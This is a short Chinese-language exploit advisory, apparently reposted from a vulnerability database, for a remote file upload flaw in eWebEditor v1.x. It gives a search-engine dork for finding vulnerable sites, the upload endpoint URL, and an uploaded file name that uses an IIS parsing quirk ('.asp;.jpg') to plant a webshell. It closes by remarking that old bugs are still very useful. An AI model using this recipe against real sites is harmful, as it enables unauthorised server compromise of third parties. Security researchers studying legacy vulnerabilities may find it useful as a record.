eWebEditor v1.x (WYSIWYG) Remote File Upload
- 发表于
- Vulndb
发布日期:2010-05.23
发布作者:Ma3sTr0-Dz
影响版本:eWebEditor v1.x
漏洞描述: eWebEditor v1.x 文件上传漏洞,通过IIS解析漏洞拿webshell.
Dork : allinurl:ewebeditor/asp/
Exploit :
/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn
/uploads/asp/sec4ever.asp;.jpg
有些BUG虽然公布的时间早,但还是非常有用的
原文连接:eWebEditor v1.x (WYSIWYG) Remote File Upload
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
